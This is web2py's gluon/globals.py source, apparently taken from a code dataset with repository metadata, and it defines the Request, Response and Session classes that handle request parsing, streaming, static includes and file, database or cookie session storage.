url(r'^callback/received-sms/$', ip_restrictions(callback_received_sms), name='callback-received-sms'),
url(r'^callback/delivery-report/$', ip_restrictions(callback_delivery_report), name='callback-delivery-report'),
) | [
"[email protected]"
] | |
a941a491e4d0a708c173a78c324d020376c894ea | bf1a44cb4836a60800d73c1f9e5fe0e25328cb43 | /web2py/gluon/globals.py | 43a28e45bc30e8c68bc8e39cdb0409b9583a43f0 | [
"LGPL-3.0-only",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-warranty-disclaimer",
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-2.0-only",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | aduckworth1969/smc | 22874e8f8c80fb727fa3aa8f12b95c4351097de1 | b1771d9ed68f0e35f46271aab5b1e1fab363e3d9 | refs/heads/master | 2023-04-05T14:23:07.486512 | 2021-04-07T16:15:45 | 2021-04-07T16:15:45 | 311,796,699 | 0 | 0 | MIT | 2021-04-07T16:15:46 | 2020-11-10T22:09:59 | Python | UTF-8 | Python | false | false | 51,798 | py | # -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <[email protected]>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Contains the classes for the global used variables:
- Request
- Response
- Session
"""
from gluon._compat import pickle, StringIO, copyreg, Cookie, urlparse, PY2, iteritems, to_unicode, to_native, \
to_bytes, unicodeT, long, hashlib_md5, urllib_quote, to_native
from gluon.storage import Storage, List
from gluon.streamer import streamer, stream_file_or_304_or_206, DEFAULT_CHUNK_SIZE
from gluon.contenttype import contenttype
from gluon.html import xmlescape, TABLE, TR, PRE, URL
from gluon.http import HTTP, redirect
from gluon.fileutils import up
from gluon.serializers import json, custom_json
import gluon.settings as settings
from gluon.utils import web2py_uuid, secure_dumps, secure_loads
from gluon.settings import global_settings
from gluon import recfile
from gluon.cache import CacheInRam
import hashlib
from pydal.contrib import portalocker
from pickle import Pickler, MARK, DICT, EMPTY_DICT
# from types import DictionaryType
import datetime
import re
import os
import sys
import traceback
import threading
import cgi
import copy
import tempfile
import json as json_parser
FMT = '%a, %d-%b-%Y %H:%M:%S PST'
PAST = 'Sat, 1-Jan-1971 00:00:00'
FUTURE = 'Tue, 1-Dec-2999 23:59:59'
try:
# FIXME PY3
from gluon.contrib.minify import minify
have_minify = True
except ImportError:
have_minify = False
__all__ = ['Request', 'Response', 'Session']
current = threading.local() # thread-local storage for request-scope globals
css_template = '<link href="%s" rel="stylesheet" type="text/css" />'
js_template = '<script src="%s" type="text/javascript"></script>'
coffee_template = '<script src="%s" type="text/coffee"></script>'
typescript_template = '<script src="%s" type="text/typescript"></script>'
less_template = '<link href="%s" rel="stylesheet/less" type="text/css" />'
css_inline = '<style type="text/css">\n%s\n</style>'
js_inline = '<script type="text/javascript">\n%s\n</script>'
template_mapping = {
'css': css_template,
'js': js_template,
'coffee': coffee_template,
'ts': typescript_template,
'less': less_template,
'css:inline': css_inline,
'js:inline': js_inline
}
# IMPORTANT:
# this is required so that pickled dict(s) and class.__dict__
# are sorted and web2py can detect without ambiguity when a session changes
class SortingPickler(Pickler):
def save_dict(self, obj):
self.write(EMPTY_DICT if self.bin else MARK + DICT)
self.memoize(obj)
self._batch_setitems([(key, obj[key]) for key in sorted(obj)])
if PY2:
SortingPickler.dispatch = copy.copy(Pickler.dispatch)
SortingPickler.dispatch[dict] = SortingPickler.save_dict
else:
SortingPickler.dispatch_table = copyreg.dispatch_table.copy()
SortingPickler.dispatch_table[dict] = SortingPickler.save_dict
def sorting_dumps(obj, protocol=None):
file = StringIO()
SortingPickler(file, protocol).dump(obj)
return file.getvalue()
# END #####################################################################
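
# Illustration (not part of web2py itself): because SortingPickler writes dict
# items in sorted key order, two equal dicts built with different insertion
# orders pickle to identical byte strings:
#
#     assert sorting_dumps({'b': 2, 'a': 1}) == sorting_dumps({'a': 1, 'b': 2})
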
def copystream(src, dest, size, chunk_size, cache_inc=None):
while size > 0:
if size < chunk_size:
data = src.read(size)
callable(cache_inc) and cache_inc(size)
else:
data = src.read(chunk_size)
callable(cache_inc) and cache_inc(chunk_size)
length = len(data)
if length > size:
(data, length) = (data[:size], size)
size -= length
if length == 0:
break
dest.write(data)
if length < chunk_size:
break
dest.seek(0)
return
def copystream_progress(request, chunk_size=10 ** 5):
"""
Copies request.env.wsgi_input into request.body
and stores progress upload status in cache_ram
X-Progress-ID:length and X-Progress-ID:uploaded
"""
env = request.env
if not env.get('CONTENT_LENGTH', None):
return StringIO()
source = env['wsgi.input']
try:
size = int(env['CONTENT_LENGTH'])
except ValueError:
raise HTTP(400, "Invalid Content-Length header")
try: # Android requires this
dest = tempfile.NamedTemporaryFile()
except NotImplementedError: # and GAE this
dest = tempfile.TemporaryFile()
if 'X-Progress-ID' not in request.get_vars:
copystream(source, dest, size, chunk_size)
return dest
cache_key = 'X-Progress-ID:' + request.get_vars['X-Progress-ID']
cache_ram = CacheInRam(request) # same as cache.ram because meta_storage
cache_ram(cache_key + ':length', lambda: size, 0)
cache_ram(cache_key + ':uploaded', lambda: 0, 0)
copystream(source, dest, size, chunk_size,
lambda v : cache_ram.increment(cache_key + ':uploaded', v))
cache_ram(cache_key + ':length', None)
cache_ram(cache_key + ':uploaded', None)
return dest
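
# Illustration (assumed usage, not part of this function): while an upload sent
# with ?X-Progress-ID=<uuid> is in flight, a separate request can poll the two
# counters kept in cache.ram, e.g. in a controller:
#
#     key = 'X-Progress-ID:' + request.get_vars['X-Progress-ID']
#     length = cache.ram(key + ':length', lambda: 0, None)
#     uploaded = cache.ram(key + ':uploaded', lambda: 0, None)
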
class Request(Storage):
"""
Defines the request object and the default values of its members
- env: environment variables, by gluon.main.wsgibase()
- cookies
- get_vars
- post_vars
- vars
- folder
- application
- function
- method
- args
- extension
- now: datetime.datetime.now()
- utcnow : datetime.datetime.utcnow()
- is_local
- is_https
- restful()
"""
def __init__(self, env):
Storage.__init__(self)
self.env = Storage(env)
self.env.web2py_path = global_settings.applications_parent
self.env.update(global_settings)
self.cookies = Cookie.SimpleCookie()
self.method = self.env.get('REQUEST_METHOD')
self._get_vars = None
self._post_vars = None
self._vars = None
self._body = None
self.folder = None
self.application = None
self.function = None
self.args = List()
self.extension = 'html'
self.now = datetime.datetime.now()
self.utcnow = datetime.datetime.utcnow()
self.is_restful = False
self.is_https = False
self.is_local = False
self.global_settings = settings.global_settings
self._uuid = None
def parse_get_vars(self):
"""Takes the QUERY_STRING and unpacks it to get_vars
"""
query_string = self.env.get('query_string', '')
dget = urlparse.parse_qs(query_string, keep_blank_values=1)
# Ref: https://docs.python.org/2/library/cgi.html#cgi.parse_qs
get_vars = self._get_vars = Storage(dget)
for (key, value) in iteritems(get_vars):
if isinstance(value, list) and len(value) == 1:
get_vars[key] = value[0]
def parse_post_vars(self):
"""Takes the body of the request and unpacks it into
post_vars. application/json is also automatically parsed
"""
env = self.env
post_vars = self._post_vars = Storage()
body = self.body
# if content-type is application/json, we must read the body
is_json = env.get('content_type', '')[:16] == 'application/json'
if is_json:
try:
# In Python 3 versions prior to 3.6 load doesn't accept bytes and
# bytearray, so we read the body convert to native and use loads
# instead of load.
# This line can be simplified to json_vars = json_parser.load(body)
# if and when we drop support for python versions under 3.6
json_vars = json_parser.loads(to_native(body.read()))
except:
# incoherent request bodies can still be parsed "ad-hoc"
json_vars = {}
pass
# update vars and get_vars with what was posted as json
if isinstance(json_vars, dict):
post_vars.update(json_vars)
body.seek(0)
# parse POST variables on POST, PUT, BOTH only in post_vars
if body and not is_json and env.request_method in ('POST', 'PUT', 'DELETE', 'BOTH'):
query_string = env.pop('QUERY_STRING', None)
content_disposition = env.get('HTTP_CONTENT_DISPOSITION')
if content_disposition:
headers = {'content-disposition': content_disposition,
'content-type': env['CONTENT_TYPE'],
'content-length': env['CONTENT_LENGTH'],
}
else:
headers = None
dpost = cgi.FieldStorage(fp=body, environ=env, headers=headers, keep_blank_values=1)
try:
post_vars.update(dpost)
except:
pass
if query_string is not None:
env['QUERY_STRING'] = query_string
# The same detection used by FieldStorage to detect multipart POSTs
body.seek(0)
def listify(a):
return (not isinstance(a, list) and [a]) or a
try:
keys = sorted(dpost)
except TypeError:
keys = []
for key in keys:
if key is None:
continue # not sure why cgi.FieldStorage returns None key
dpk = dpost[key]
# if an element is not a file replace it with
# its value else leave it alone
pvalue = listify([(_dpk if _dpk.filename else _dpk.value)
for _dpk in dpk]
if isinstance(dpk, list) else
(dpk if dpk.filename else dpk.value))
if len(pvalue):
post_vars[key] = (len(pvalue) > 1 and pvalue) or pvalue[0]
@property
def body(self):
if self._body is None:
try:
self._body = copystream_progress(self)
except IOError:
raise HTTP(400, "Bad Request - HTTP body is incomplete")
return self._body
def parse_all_vars(self):
"""Merges get_vars and post_vars to vars
"""
self._vars = copy.copy(self.get_vars)
for key, value in iteritems(self.post_vars):
if key not in self._vars:
self._vars[key] = value
else:
if not isinstance(self._vars[key], list):
self._vars[key] = [self._vars[key]]
self._vars[key] += value if isinstance(value, list) else [value]
@property
def get_vars(self):
"""Lazily parses the query string into get_vars
"""
if self._get_vars is None:
self.parse_get_vars()
return self._get_vars
@property
def post_vars(self):
"""Lazily parse the body into post_vars
"""
if self._post_vars is None:
self.parse_post_vars()
return self._post_vars
@property
def vars(self):
"""Lazily parses all get_vars and post_vars to fill vars
"""
if self._vars is None:
self.parse_all_vars()
return self._vars
@property
def uuid(self):
"""Lazily uuid
"""
if self._uuid is None:
self.compute_uuid()
return self._uuid
def compute_uuid(self):
self._uuid = '%s/%s.%s.%s' % (
self.application,
self.client.replace(':', '_'),
self.now.strftime('%Y-%m-%d.%H-%M-%S'),
web2py_uuid())
return self._uuid
def user_agent(self):
from gluon.contrib import user_agent_parser
session = current.session
user_agent = session._user_agent
if user_agent:
return user_agent
http_user_agent = self.env.http_user_agent or ''
user_agent = user_agent_parser.detect(http_user_agent)
for key, value in user_agent.items():
if isinstance(value, dict):
user_agent[key] = Storage(value)
user_agent = Storage(user_agent)
user_agent.is_mobile = 'Mobile' in http_user_agent
user_agent.is_tablet = 'Tablet' in http_user_agent
session._user_agent = user_agent
return user_agent
def requires_https(self):
"""
If request comes in over HTTP, redirects it to HTTPS
and secures the session.
"""
cmd_opts = global_settings.cmd_options
# checking if this is called within the scheduler or within the shell
# in addition to checking if it's a cron job
if (self.is_https or self.is_scheduler or cmd_opts and (
cmd_opts.shell or cmd_opts.cron_job)):
current.session.secure()
else:
current.session.forget()
redirect(URL(scheme='https', args=self.args, vars=self.vars))
def restful(self, ignore_extension=False):
def wrapper(action, request=self):
def f(_action=action, *a, **b):
request.is_restful = True
env = request.env
is_json = env.content_type == 'application/json'
method = env.request_method
if not ignore_extension and len(request.args) and '.' in request.args[-1]:
request.args[-1], _, request.extension = request.args[-1].rpartition('.')
current.response.headers['Content-Type'] = \
contenttype('.' + request.extension.lower())
rest_action = _action().get(method, None)
if not (rest_action and method == method.upper()
and callable(rest_action)):
raise HTTP(405, "method not allowed")
try:
res = rest_action(*request.args, **request.vars)
if is_json and not isinstance(res, str):
res = json(res)
return res
except TypeError as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
if len(traceback.extract_tb(exc_traceback)) == 1:
raise HTTP(400, "invalid arguments")
else:
raise
f.__doc__ = action.__doc__
f.__name__ = action.__name__
return f
return wrapper
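

# Typical (illustrative) use of Request.restful in a controller: the decorated
# action returns a mapping of HTTP method names to callables, e.g.
#
#     @request.restful()
#     def api():
#         def GET(*args, **vars):
#             return dict(args=args)
#         def POST(*args, **vars):
#             return dict(received=vars)
#         return locals()
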
class Response(Storage):
"""
Defines the response object and the default values of its members
response.write( ) can be used to write in the output html
"""
def __init__(self):
Storage.__init__(self)
self.status = 200
self.headers = dict()
self.headers['X-Powered-By'] = 'web2py'
self.body = StringIO()
self.session_id = None
self.cookies = Cookie.SimpleCookie()
self.postprocessing = []
self.flash = '' # used by the default view layout
self.meta = Storage() # used by web2py_ajax.html
self.menu = [] # used by the default view layout
self.files = [] # used by web2py_ajax.html
self._vars = None
self._caller = lambda f: f()
self._view_environment = None
self._custom_commit = None
self._custom_rollback = None
self.generic_patterns = ['*']
self.delimiters = ('{{', '}}')
self.formstyle = 'table3cols'
self.form_label_separator = ': '
def write(self, data, escape=True):
if not escape:
self.body.write(str(data))
else:
self.body.write(to_native(xmlescape(data)))
def render(self, *a, **b):
from gluon.compileapp import run_view_in
if len(a) > 2:
raise SyntaxError(
'Response.render can be called with two arguments, at most')
elif len(a) == 2:
(view, self._vars) = (a[0], a[1])
elif len(a) == 1 and isinstance(a[0], str):
(view, self._vars) = (a[0], {})
elif len(a) == 1 and hasattr(a[0], 'read') and callable(a[0].read):
(view, self._vars) = (a[0], {})
elif len(a) == 1 and isinstance(a[0], dict):
(view, self._vars) = (None, a[0])
else:
(view, self._vars) = (None, {})
self._vars.update(b)
self._view_environment.update(self._vars)
if view:
from gluon._compat import StringIO
(obody, oview) = (self.body, self.view)
(self.body, self.view) = (StringIO(), view)
page = run_view_in(self._view_environment)
self.body.close()
(self.body, self.view) = (obody, oview)
else:
page = run_view_in(self._view_environment)
return page
def include_meta(self):
s = "\n"
for meta in iteritems((self.meta or {})):
k, v = meta
if isinstance(v, dict):
s += '<meta' + ''.join(' %s="%s"' % (to_native(xmlescape(key)),
to_native(xmlescape(v[key]))) for key in v) + ' />\n'
else:
s += '<meta name="%s" content="%s" />\n' % (k, to_native(xmlescape(v)))
self.write(s, escape=False)
def include_files(self, extensions=None):
"""
Includes files (usually in the head).
Can minify and cache local files
By default, caches in ram for 5 minutes. To change,
response.cache_includes = (cache_method, time_expire).
Example: (cache.disk, 60) # caches to disk for 1 minute.
"""
app = current.request.application
# We start by building a files list in which adjacent files internal to
# the application are placed in a list inside the files list.
#
# We will only minify and concat adjacent internal files as there's
# no way to know if changing the order with which the files are apppended
# will break things since the order matters in both CSS and JS and
# internal files may be interleaved with external ones.
files = []
# For the adjacent list we're going to use storage List to both distinguish
# from the regular list and so we can add attributes
internal = List()
internal.has_js = False
internal.has_css = False
done = set() # to remove duplicates
for item in self.files:
if not isinstance(item, list):
if item in done:
continue
done.add(item)
if isinstance(item, (list, tuple)) or not item.startswith('/' + app): # also consider items in other web2py applications to be external
if internal:
files.append(internal)
internal = List()
internal.has_js = False
internal.has_css = False
files.append(item)
continue
if extensions and not item.rpartition('.')[2] in extensions:
continue
internal.append(item)
if item.endswith('.js'):
internal.has_js = True
if item.endswith('.css'):
internal.has_css = True
if internal:
files.append(internal)
# We're done we can now minify
if have_minify:
for i, f in enumerate(files):
if isinstance(f, List) and ((self.optimize_css and f.has_css) or (self.optimize_js and f.has_js)):
# cache for 5 minutes by default
key = hashlib_md5(repr(f)).hexdigest()
cache = self.cache_includes or (current.cache.ram, 60 * 5)
def call_minify(files=f):
return List(minify.minify(files,
URL('static', 'temp'),
current.request.folder,
self.optimize_css,
self.optimize_js))
if cache:
cache_model, time_expire = cache
files[i] = cache_model('response.files.minified/' + key,
call_minify,
time_expire)
else:
files[i] = call_minify()
def static_map(s, item):
if isinstance(item, str):
f = item.lower().split('?')[0]
ext = f.rpartition('.')[2]
# if static_version we need also to check for
# static_version_urls. In that case, the _.x.x.x
# bit would have already been added by the URL()
# function
if self.static_version and not self.static_version_urls:
item = item.replace(
'/static/', '/static/_%s/' % self.static_version, 1)
tmpl = template_mapping.get(ext)
if tmpl:
s.append(tmpl % item)
elif isinstance(item, (list, tuple)):
f = item[0]
tmpl = template_mapping.get(f)
if tmpl:
s.append(tmpl % item[1])
s = []
for item in files:
if isinstance(item, List):
for f in item:
static_map(s, f)
else:
static_map(s, item)
self.write(''.join(s), escape=False)
def stream(self,
stream,
chunk_size=DEFAULT_CHUNK_SIZE,
request=None,
attachment=False,
filename=None
):
"""
If in a controller function::
return response.stream(file, 100)
the file content will be streamed at 100 bytes at the time
Args:
stream: filename or read()able content
chunk_size(int): Buffer size
request: the request object
attachment(bool): prepares the correct headers to download the file
as an attachment. Usually creates a pop-up download window
on browsers
filename(str): the name for the attachment
Note:
for using the stream name (filename) with attachments
the option must be explicitly set as function parameter (will
default to the last request argument otherwise)
"""
headers = self.headers
# for attachment settings and backward compatibility
keys = [item.lower() for item in headers]
if attachment:
# FIXME: should be done like in next download method
if filename is None:
attname = ""
else:
attname = filename
headers["Content-Disposition"] = \
'attachment; filename="%s"' % attname
if not request:
request = current.request
if isinstance(stream, (str, unicodeT)):
stream_file_or_304_or_206(stream,
chunk_size=chunk_size,
request=request,
headers=headers,
status=self.status)
# ## the following is for backward compatibility
if hasattr(stream, 'name'):
filename = stream.name
if filename and 'content-type' not in keys:
headers['Content-Type'] = contenttype(filename)
if filename and 'content-length' not in keys:
try:
headers['Content-Length'] = \
os.path.getsize(filename)
except OSError:
pass
env = request.env
# Internet Explorer < 9.0 will not allow downloads over SSL unless caching is enabled
if request.is_https and isinstance(env.http_user_agent, str) and \
not re.search(r'Opera', env.http_user_agent) and \
re.search(r'MSIE [5-8][^0-9]', env.http_user_agent):
headers['Pragma'] = 'cache'
headers['Cache-Control'] = 'private'
if request and env.web2py_use_wsgi_file_wrapper:
wrapped = env.wsgi_file_wrapper(stream, chunk_size)
else:
wrapped = streamer(stream, chunk_size=chunk_size)
return wrapped
def download(self, request, db, chunk_size=DEFAULT_CHUNK_SIZE, attachment=True, download_filename=None):
"""
Example of usage in controller::
def download():
return response.download(request, db)
Downloads from http://..../download/filename
"""
from pydal.helpers.regex import REGEX_UPLOAD_PATTERN
from pydal.exceptions import NotAuthorizedException, NotFoundException
current.session.forget(current.response)
if not request.args:
raise HTTP(404)
name = request.args[-1]
items = re.match(REGEX_UPLOAD_PATTERN, name)
if not items:
raise HTTP(404)
t = items.group('table'); f = items.group('field')
try:
field = db[t][f]
except (AttributeError, KeyError):
raise HTTP(404)
try:
(filename, stream) = field.retrieve(name, nameonly=True)
except NotAuthorizedException:
raise HTTP(403)
except NotFoundException:
raise HTTP(404)
except IOError:
raise HTTP(404)
headers = self.headers
headers['Content-Type'] = contenttype(name)
if download_filename is None:
download_filename = filename
if attachment:
# Browsers still don't have a simple uniform way to have non ascii
# characters in the filename so for now we are percent encoding it
if isinstance(download_filename, unicodeT):
download_filename = download_filename.encode('utf-8')
download_filename = urllib_quote(download_filename)
headers['Content-Disposition'] = \
'attachment; filename="%s"' % download_filename.replace('"', '\\"')
return self.stream(stream, chunk_size=chunk_size, request=request)
def json(self, data, default=None, indent=None):
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/json'
return json(data, default=default or custom_json, indent=indent)
def xmlrpc(self, request, methods):
from gluon.xmlrpc import handler
"""
assuming::
def add(a, b):
return a+b
        in a controller function \"func\"::
return response.xmlrpc(request, [add])
the controller will be able to handle xmlrpc requests for
the add function. Example::
import xmlrpclib
connection = xmlrpclib.ServerProxy(
'http://hostname/app/contr/func')
print(connection.add(3, 4))
"""
return handler(request, self, methods)
def toolbar(self):
from gluon.html import DIV, SCRIPT, BEAUTIFY, TAG, A
BUTTON = TAG.button
admin = URL("admin", "default", "design", extension='html',
args=current.request.application)
from gluon.dal import DAL
dbstats = []
dbtables = {}
infos = DAL.get_instances()
for k, v in iteritems(infos):
dbstats.append(TABLE(*[TR(PRE(row[0]), '%.2fms' % (row[1]*1000))
for row in v['dbstats']]))
dbtables[k] = dict(defined=v['dbtables']['defined'] or '[no defined tables]',
lazy=v['dbtables']['lazy'] or '[no lazy tables]')
u = web2py_uuid()
backtotop = A('Back to top', _href="#totop-%s" % u)
# Convert lazy request.vars from property to Storage so they
# will be displayed in the toolbar.
request = copy.copy(current.request)
request.update(vars=current.request.vars,
get_vars=current.request.get_vars,
post_vars=current.request.post_vars)
return DIV(
BUTTON('design', _onclick="document.location='%s'" % admin),
BUTTON('request',
_onclick="jQuery('#request-%s').slideToggle()" % u),
BUTTON('response',
_onclick="jQuery('#response-%s').slideToggle()" % u),
BUTTON('session',
_onclick="jQuery('#session-%s').slideToggle()" % u),
BUTTON('db tables',
_onclick="jQuery('#db-tables-%s').slideToggle()" % u),
BUTTON('db stats',
_onclick="jQuery('#db-stats-%s').slideToggle()" % u),
DIV(BEAUTIFY(request), backtotop,
_class="w2p-toolbar-hidden", _id="request-%s" % u),
DIV(BEAUTIFY(current.session), backtotop,
_class="w2p-toolbar-hidden", _id="session-%s" % u),
DIV(BEAUTIFY(current.response), backtotop,
_class="w2p-toolbar-hidden", _id="response-%s" % u),
DIV(BEAUTIFY(dbtables), backtotop,
_class="w2p-toolbar-hidden", _id="db-tables-%s" % u),
DIV(BEAUTIFY(dbstats), backtotop,
_class="w2p-toolbar-hidden", _id="db-stats-%s" % u),
SCRIPT("jQuery('.w2p-toolbar-hidden').hide()"),
_id="totop-%s" % u
)
class Session(Storage):
"""
Defines the session object and the default values of its members (None)
- session_storage_type : 'file', 'db', or 'cookie'
- session_cookie_compression_level :
- session_cookie_expires : cookie expiration
- session_cookie_key : for encrypted sessions in cookies
- session_id : a number or None if no session
- session_id_name :
- session_locked :
- session_masterapp :
- session_new : a new session obj is being created
- session_hash : hash of the pickled loaded session
- session_pickled : picked session
if session in cookie:
- session_data_name : name of the cookie for session data
if session in db:
- session_db_record_id
- session_db_table
- session_db_unique_key
if session in file:
- session_file
- session_filename
"""
REGEX_SESSION_FILE = r'^(?:[\w-]+/)?[\w.-]+$'
def connect(self,
request=None,
response=None,
db=None,
tablename='web2py_session',
masterapp=None,
migrate=True,
separate=None,
check_client=False,
cookie_key=None,
cookie_expires=None,
compression_level=None
):
"""
Used in models, allows to customize Session handling
Args:
request: the request object
response: the response object
db: to store/retrieve sessions in db (a table is created)
tablename(str): table name
            masterapp(str): points to another app's sessions. This enables an
                "SSO" environment among apps
migrate: passed to the underlying db
separate: with True, creates a folder with the 2 initials of the
session id. Can also be a function, e.g. ::
                separate=lambda session_name: session_name[-2:]
check_client: if True, sessions can only come from the same ip
cookie_key(str): secret for cookie encryption
cookie_expires: sets the expiration of the cookie
compression_level(int): 0-9, sets zlib compression on the data
before the encryption
"""
request = request or current.request
response = response or current.response
masterapp = masterapp or request.application
cookies = request.cookies
self._unlock(response)
response.session_masterapp = masterapp
response.session_id_name = 'session_id_%s' % masterapp.lower()
response.session_data_name = 'session_data_%s' % masterapp.lower()
response.session_cookie_expires = cookie_expires
response.session_client = str(request.client).replace(':', '.')
current._session_cookie_key = cookie_key
response.session_cookie_compression_level = compression_level
# check if there is a session_id in cookies
try:
old_session_id = cookies[response.session_id_name].value
except KeyError:
old_session_id = None
response.session_id = old_session_id
# if we are supposed to use cookie based session data
if cookie_key:
response.session_storage_type = 'cookie'
elif db:
response.session_storage_type = 'db'
else:
response.session_storage_type = 'file'
# why do we do this?
# because connect may be called twice, by web2py and in models.
# the first time there is no db yet so it should do nothing
if (global_settings.db_sessions is True
or masterapp in global_settings.db_sessions):
return
if response.session_storage_type == 'cookie':
# check if there is session data in cookies
if response.session_data_name in cookies:
session_cookie_data = cookies[response.session_data_name].value
else:
session_cookie_data = None
if session_cookie_data:
data = secure_loads(session_cookie_data, cookie_key,
compression_level=compression_level)
if data:
self.update(data)
response.session_id = True
# else if we are supposed to use file based sessions
elif response.session_storage_type == 'file':
response.session_new = False
response.session_file = None
            # check if the session_id points to a valid session filename
if response.session_id:
if not re.match(self.REGEX_SESSION_FILE, response.session_id):
response.session_id = None
else:
response.session_filename = \
os.path.join(up(request.folder), masterapp,
'sessions', response.session_id)
try:
response.session_file = \
recfile.open(response.session_filename, 'rb+')
portalocker.lock(response.session_file,
portalocker.LOCK_EX)
response.session_locked = True
self.update(pickle.load(response.session_file))
response.session_file.seek(0)
oc = response.session_filename.split('/')[-1].split('-')[0]
if check_client and response.session_client != oc:
raise Exception("cookie attack")
except:
response.session_id = None
if not response.session_id:
uuid = web2py_uuid()
response.session_id = '%s-%s' % (response.session_client, uuid)
separate = separate and (lambda session_name: session_name[-2:])
if separate:
prefix = separate(response.session_id)
response.session_id = '%s/%s' % (prefix, response.session_id)
response.session_filename = \
os.path.join(up(request.folder), masterapp,
'sessions', response.session_id)
response.session_new = True
# else the session goes in db
elif response.session_storage_type == 'db':
if global_settings.db_sessions is not True:
global_settings.db_sessions.add(masterapp)
            # if we had a session on file already, close it (yes, can happen)
if response.session_file:
self._close(response)
# if on GAE tickets go also in DB
if settings.global_settings.web2py_runtime_gae:
request.tickets_db = db
if masterapp == request.application:
table_migrate = migrate
else:
table_migrate = False
tname = tablename + '_' + masterapp
table = db.get(tname, None)
Field = db.Field
if table is None:
db.define_table(
tname,
Field('locked', 'boolean', default=False),
Field('client_ip', length=64),
Field('created_datetime', 'datetime',
default=request.now),
Field('modified_datetime', 'datetime'),
Field('unique_key', length=64),
Field('session_data', 'blob'),
migrate=table_migrate,
)
table = db[tname] # to allow for lazy table
response.session_db_table = table
if response.session_id:
# Get session data out of the database
try:
(record_id, unique_key) = response.session_id.split(':')
record_id = long(record_id)
except (TypeError, ValueError):
record_id = None
# Select from database
if record_id:
row = table(record_id, unique_key=unique_key)
# Make sure the session data exists in the database
if row:
# rows[0].update_record(locked=True)
# Unpickle the data
try:
session_data = pickle.loads(row['session_data'])
self.update(session_data)
response.session_new = False
except:
record_id = None
else:
record_id = None
if record_id:
response.session_id = '%s:%s' % (record_id, unique_key)
response.session_db_unique_key = unique_key
response.session_db_record_id = record_id
else:
response.session_id = None
response.session_new = True
# if there is no session id yet, we'll need to create a
# new session
else:
response.session_new = True
# set the cookie now if you know the session_id so user can set
# cookie attributes in controllers/models
# cookie will be reset later
# yet cookie may be reset later
# Removed comparison between old and new session ids - should send
# the cookie all the time
if isinstance(response.session_id, str):
response.cookies[response.session_id_name] = response.session_id
response.cookies[response.session_id_name]['path'] = '/'
if cookie_expires:
response.cookies[response.session_id_name]['expires'] = \
cookie_expires.strftime(FMT)
session_pickled = pickle.dumps(self, pickle.HIGHEST_PROTOCOL)
response.session_hash = hashlib.md5(session_pickled).hexdigest()
if self.flash:
(response.flash, self.flash) = (self.flash, None)
def renew(self, clear_session=False):
if clear_session:
self.clear()
request = current.request
response = current.response
session = response.session
masterapp = response.session_masterapp
cookies = request.cookies
if response.session_storage_type == 'cookie':
return
# if the session goes in file
if response.session_storage_type == 'file':
self._close(response)
uuid = web2py_uuid()
response.session_id = '%s-%s' % (response.session_client, uuid)
separate = (lambda s: s[-2:]) if session and response.session_id[2:3] == "/" else None
if separate:
prefix = separate(response.session_id)
response.session_id = '%s/%s' % \
(prefix, response.session_id)
response.session_filename = \
os.path.join(up(request.folder), masterapp,
'sessions', response.session_id)
response.session_new = True
# else the session goes in db
elif response.session_storage_type == 'db':
table = response.session_db_table
# verify that session_id exists
if response.session_file:
self._close(response)
if response.session_new:
return
# Get session data out of the database
if response.session_id is None:
return
(record_id, sep, unique_key) = response.session_id.partition(':')
if record_id.isdigit() and long(record_id) > 0:
new_unique_key = web2py_uuid()
row = table(record_id)
if row and to_native(row['unique_key']) == to_native(unique_key):
table._db(table.id == record_id).update(unique_key=new_unique_key)
else:
record_id = None
if record_id:
response.session_id = '%s:%s' % (record_id, new_unique_key)
response.session_db_record_id = record_id
response.session_db_unique_key = new_unique_key
else:
response.session_new = True
def _fixup_before_save(self):
response = current.response
rcookies = response.cookies
scookies = rcookies.get(response.session_id_name)
if not scookies:
return
if self._forget:
del rcookies[response.session_id_name]
return
if self.get('httponly_cookies', True):
scookies['HttpOnly'] = True
if self._secure:
scookies['secure'] = True
if self._same_site is None:
# Using SameSite Lax Mode is the default
# You actually have to call session.samesite(False) if you really
            # don't want the extra protection provided by the SameSite header
self._same_site = 'Lax'
if self._same_site:
if 'samesite' not in Cookie.Morsel._reserved:
# Python version 3.7 and lower needs this
Cookie.Morsel._reserved['samesite'] = 'SameSite'
scookies['samesite'] = self._same_site
def clear_session_cookies(self):
request = current.request
response = current.response
session = response.session
masterapp = response.session_masterapp
cookies = request.cookies
rcookies = response.cookies
# if not cookie_key, but session_data_name in cookies
# expire session_data_name from cookies
if response.session_data_name in cookies:
rcookies[response.session_data_name] = 'expired'
rcookies[response.session_data_name]['path'] = '/'
rcookies[response.session_data_name]['expires'] = PAST
if response.session_id_name in rcookies:
del rcookies[response.session_id_name]
def save_session_id_cookie(self):
request = current.request
response = current.response
session = response.session
masterapp = response.session_masterapp
cookies = request.cookies
rcookies = response.cookies
# if not cookie_key, but session_data_name in cookies
# expire session_data_name from cookies
if not current._session_cookie_key:
if response.session_data_name in cookies:
rcookies[response.session_data_name] = 'expired'
rcookies[response.session_data_name]['path'] = '/'
rcookies[response.session_data_name]['expires'] = PAST
if response.session_id:
rcookies[response.session_id_name] = response.session_id
rcookies[response.session_id_name]['path'] = '/'
expires = response.session_cookie_expires
if isinstance(expires, datetime.datetime):
expires = expires.strftime(FMT)
if expires:
rcookies[response.session_id_name]['expires'] = expires
def clear(self):
# see https://github.com/web2py/web2py/issues/735
response = current.response
if response.session_storage_type == 'file':
target = recfile.generate(response.session_filename)
try:
self._close(response)
os.unlink(target)
except:
pass
elif response.session_storage_type == 'db':
table = response.session_db_table
if response.session_id:
(record_id, sep, unique_key) = response.session_id.partition(':')
if record_id.isdigit() and long(record_id) > 0:
table._db(table.id == record_id).delete()
Storage.clear(self)
def is_new(self):
if self._start_timestamp:
return False
else:
self._start_timestamp = datetime.datetime.today()
return True
def is_expired(self, seconds=3600):
now = datetime.datetime.today()
if not self._last_timestamp or \
self._last_timestamp + datetime.timedelta(seconds=seconds) > now:
self._last_timestamp = now
return False
else:
return True
def secure(self):
self._secure = True
def samesite(self, mode='Lax'):
self._same_site = mode
def forget(self, response=None):
self._close(response)
self._forget = True
def _try_store_in_cookie(self, request, response):
if self._forget or self._unchanged(response):
# self.clear_session_cookies()
self.save_session_id_cookie()
return False
name = response.session_data_name
